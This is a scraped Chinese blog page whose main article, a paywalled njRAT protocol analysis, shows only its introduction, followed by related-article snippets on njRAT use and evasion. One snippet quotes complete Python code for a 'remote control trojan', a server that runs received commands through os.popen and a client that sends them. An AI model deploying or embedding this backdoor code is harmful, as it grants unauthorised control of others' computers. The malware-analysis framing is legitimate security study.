njRAT远程访问木马协议分析

最新推荐文章于 2023-08-27 17:42:02 发布
VIP文章 最新推荐文章于 2023-08-27 17:42:02 发布
阅读量7.6k 收藏 13
点赞数 1
分类专栏: 协议分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kevin_bobolkevin/article/details/53408960
版权

第一节    简介

njRAT在2013年第一次出现,主要盛行于中东地区,在世界其他国家和地区也有广泛传播。njRAT 程序完美支持阿拉伯字符,有证据表明极端组织ISIS使用njRAT作为重要的网络武器。njRAT使用微软的 .NET框架开发,并像其他许多木马一样为远程攻击者提供了对被感 染系统的完全控制功能。我们已经看到攻击者利用被污染的流行游戏、破解软件及注册机来进行污染传播。njRAT木马因其广泛流传的在线支持和教程,已成为最成功的网络犯罪工具之一。与此同时,目前网络中也有较多.NET 混淆工具流传,使病毒检测相对困难,妨碍了安全研究人员的分析。

第二节 描述



第二章 样本包分析

请求报文都相同,以下的类型是按响应报文划分的,共有3种。

第一节    类型一

一、基本属性


<
最低0.47元/天 解锁文章
kevin_baixy
关注
  • 1
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Docker之开启远程访问的实现
09-30
主要介绍了Docker之开启远程访问的实现,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
njrat的初步了解 远控实验及流量分析
m0_46377671的博客
07-11 5531
有不对的地方请指正 1.njart介绍 njRAT,也称为Bladabindi,[1]是一种远程访问工具(RAT) 或木马,它允许程序的持有者控制最终用户的计算机。它于 2013 年 6 月首次被发现,其中一些变体可追溯到 2012 年 11 月。它是由来自不同国家的名为 Sparclyheason 的黑客组织制作的,经常用于攻击中东的目标。它可以通过网络钓鱼和受感染的驱动器传播。 RedPacket Security 将 NJRat 描述为“远程访问木马 (RAT) 具有记录击键、访问受害者的相机、窃
警惕:新型蠕虫病毒通过可移动驱动器传播,并安装BLADABINDI后门
weixin_34256074的博客
11-30 1365
BLADABINDI,也被称为njRAT或Njw0rm,是一种远程访问***(RAT),具有众多后门功能——从键盘记录到执行分布式拒绝服务(DDoS)。自首次出现以来,该***就已经在各种网络间谍活动中被重新编译和使用。事实上,BLADABINDI的可定制性以及可以在暗网地下黑市购买到的特性使得它成为一个广泛存在的威胁。举个例子:在上周,趋势科技就遇到了一种蠕虫病毒(由趋势科...
njRAT v0.7d 远程控制软件
04-08
njRAT v0.7d 远程控制软件。 远程控制软件,最著名远控软件,njRAT v0.7d 远程控制软件,最著名远控软件,njRAT v0.7d 远程控制
Linux远程访问工具
06-08
Linux远程访问工具(包含Xshell6和7,两个版本都有;还有Xftp6和7,也是两个版本都有,均可以直接安装,免费版本,不用破解!!!)
Njrat免杀实例2
04-23
Njrat免杀实例2
njRAT 简单使用案例
Myu_wzy的博客
11-26 2355
目录 一、njRAT 介绍 二、实验案例 1. 实验环境 2. 实验过程 (1)获取临时权限 (2)使用 njRAT 生成远控程序 (3)使用 Kali 上传该远控程序到靶机 (4)远程运行该远控程序 (5)靶机在服务端上线,成功远控靶机 三、参考资料 一、njRAT 介绍 njRAT,也称为Bladabindi,[1]是一种远程访问工具(RAT) 或木马,它允许程序的持有者控制最终用户的计算机。它于 2013 年 6 月首次被发现,其中一些变体可追溯到 201...
网络安全:njRAT远控工具
weixin_74245209的博客
08-27 829
剩下的不说了值得一提:这个程序是rookit病毒很强力直接到内核杀毒软件在其运行之前可查杀,但在成功双击之后很难再次清除。受害者的设备,记录击键、访问摄像头、窃取浏览器中存储的凭据、上传/下载文件、操作注册表等。1.在一开始,我们要先将木马主程序,控制端安装在有公网地址(注意:一定保证外网可以访问)远控在渗透实战中的维权操作相当重要,今天为大家介绍一款工具:njrat。2.点击下面的builder并在红圈处输入自己的外网地址和开放端口。,可以下发相应的指令触发恶意软件的功能,也能获取目标的各种数据。
网络安全之史上最全的njRAT通信协议分析
WSN_IPv6的博客
04-07 2368
网址:http://www.freebuf.com/articles/network/122244.html
一个Windows远程工具,小巧但实用,支持RDP、SSH、SFTP、FTP等多种协议
成长的足迹
11-04 880
1、支持协议:RDP、SSH、VNC、Telnet、(S)FTP、RemoteApp、NoMachine。》,这个项目是基于 MSTSC的远程桌面工具,今天给大家推荐另外一个远程桌面工具,该工具。、通过启动器可以开始启动,总体来说,功能强大,非常实用,一个工具解决所有远程链接问题。4、支持详细连接配置:标签、图标、颜色、连接脚本等。3、支持多屏幕和HiDPI RDP连接。5、支持多种语言、主题和选项卡界面。7、加密:通过RSA进行密码加密。1、平台:基于C#开发。9、自动:自动运行并连接。
Windows远程访问管理工具
09-08
Windows远程访问工具 BvSshClient-Inst.exe BvSshServer-Inst.exe
OPC远程访问配置文档
12-17
OPC远程访问配置文档,本人按照此文档操作解决了OPC远程访问配置问题
MongoDB远程访问配置步骤详解
12-16
本文介绍的内容是关于MongoDB远程访问配置,下面话不多说,直接来看看详细的步骤。 1、首先修改mongodb的配置文件 让其监听所有外网ip 编辑文件: /etc/mongodb.conf 修改后的内容如下: bind_ip = 0.0.0.0 port ...
mysql设置指定ip远程访问连接实例
09-10
主要介绍了mysql设置指定ip远程访问连接的方法,分别实例讲述了从任意主机和指定ip访问远程MySQL数据库的方法,代码简单功能实用,需要的朋友可以参考下
远程访问登录界面网页模板
01-22
远程访问登录界面网页模板
Oracle 配置远程访问教程
09-09
主要介绍了Oracle 配置远程访问教程,非常不错,具有参考借鉴价值,需要的朋友参考下吧,需要的朋友可以参考下
MySQL远程访问设置终极方法
09-10
主要介绍了MySQL远程访问设置终极方法,本文总结了多种设置方法和技巧,是解决远程访问的终极解决方案,需要的朋友可以参考下
基于HttpClient的Android远程数据库访问
01-19
摘要:虽然Android有SQLite的支持,但由于手机的硬件条件限制,很多数据库并没有直接运行在客户端上,因此对远程数据库的访问也是Android的必要技术。本文主要运用HttpClient组件,完成对远程数据库的访问,实现...
Linux远程访问工具,支持ssh服务
07-27
Linux远程访问工具,支持ssh服务
python远程控制木马
最新发布
09-05
远程控制木马是一种恶意软件,它通过网络连接远程主机,并允许攻击者在目标计算机上执行各种操作和命令。根据提供的引用内容,以下是一个使用Python编写的远程控制木马的示例代码: ```python # 服务端(server)程序 import socket import os def attack(): try: s = socket.socket() s.bind(('0.0.0.0', 6667)) # 使用默认地址,所有设备均可访问该服务器的6667端口 s.listen() # 对6667端口进行监听 channel, client = s.accept() # 进入阻塞状态,accept() 返回元组,接受来自客户端的数据 # channel: 新的socket对象用于标识出服务器和哪个客户端连接进行通信 # client: 客户端的IP和端口 while True: receive = channel.recv(1024).decode() # 接收来自客户端的命令 reply = os.popen(receive).read() # 执行命令,并获取执行结果 channel.send(f"命令{receive}的运行结果:\n{reply}".encode()) # 将结果发送回客户端 except: s.close() if __name__ == '__main__': attack() # 客户端(client)程序 import socket s = socket.socket() s.connect(('192.168.137.1', 6667)) # 192.168.137.1是socket服务器的地址 while True: sendstr = input("请输入消息:") s.send(sendstr.encode()) # 将命令发送给服务器 receive = s.recv(1024).decode() # 接收服务器的回复 print(f"服务器回复:{receive}") ``` 请注意,远程控制木马是一种非法行为,严重侵犯他人隐私和安全。在进行任何网络活动时,请始终遵守法律和道德规范。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [基于Python实现socket远程木马](https://blog.csdn.net/weixin_49472648/article/details/125308268)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值